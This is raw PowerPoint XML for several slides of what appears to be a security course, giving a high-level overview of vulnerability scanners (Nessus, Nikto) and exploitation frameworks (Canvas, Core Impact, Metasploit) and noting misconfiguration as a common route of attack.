            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CFF773A7-A125-48C0-80FE-56592BDC21E6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54276" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1397000" y="2209800"/>
            <a:ext cx="9753600" cy="6743700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nessus Plugin Selection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6215A585-2E4A-4E9D-906A-89819F96436E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55300" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616200" y="1676400"/>
            <a:ext cx="7988300" cy="7759700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nessus Scan Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7EF8290E-1D2F-40BD-BD53-6D48DA5DE01D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56324" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="2438400"/>
            <a:ext cx="11353800" cy="6886575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Vulnerability Scanners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{99B79D16-9FA9-436F-A0CE-9E62AEE09E40}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2286000"/>
            <a:ext cx="11506200" cy="7848600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – Most popular. Vera also recently introduced </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Looks for default files and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and well as server misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Provides versioning information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Runs on Linux or Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.cirt.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34"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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1968500"/>
            <a:ext cx="12128500" cy="6794500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The configuration (or lack of) a network, computer or application is probably the number one source of access for a hacker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>There is typically no easy way to view configurations for completeness and very few tools for computing correctness. Misconfigurations are therefore hidden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Networks and network elements are named as an abstraction layer so that network designers and operators can more easily understand the network architecture and functionality. Hackers on gleaning the abstraction layer use it to further develop the network and its exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Much of the discovery techniques that were originally done by hand can now be done by software tools that are embedded in a bot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(Good) Configuration is the first line of defense against an attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF0716D7-8413-4269-8B77-F22C1C40A2F8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="950992511"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nikto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55B6305D-7B37-4EBB-A2A7-45A32AB6B0F4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58372" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="719" t="827"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244600" y="2115402"/>
            <a:ext cx="10528300" cy="6952397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="1143000"/>
            <a:ext cx="12204700" cy="519113"/>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Exploits Bought and Sold</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59395" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="17894" b="17894"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="327025" y="1978025"/>
            <a:ext cx="12203113" cy="7037388"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB136913-2141-48F8-96A9-5D014EBFEC58}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2286000"/>
            <a:ext cx="11506200" cy="7202488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Immunity Canvas </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Commercial (http://www.immunitysec.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Core Impact </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Commercial (http://www.coresecurity.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Open Source although recently aquired by Rapid7 (http://www.metasploit.org)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="990600"/>
            <a:ext cx="11703050" cy="102552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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Immunity Canvas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{401C7226-ADF9-427E-8B2F-8F47457218D7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61444" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2286000"/>
            <a:ext cx="11506200" cy="5908675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Runs on Windows, OS X or Linux (Linux recommended)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Currently over 500 exploits with an average of 4 exploits added each month</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flexible payload options: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
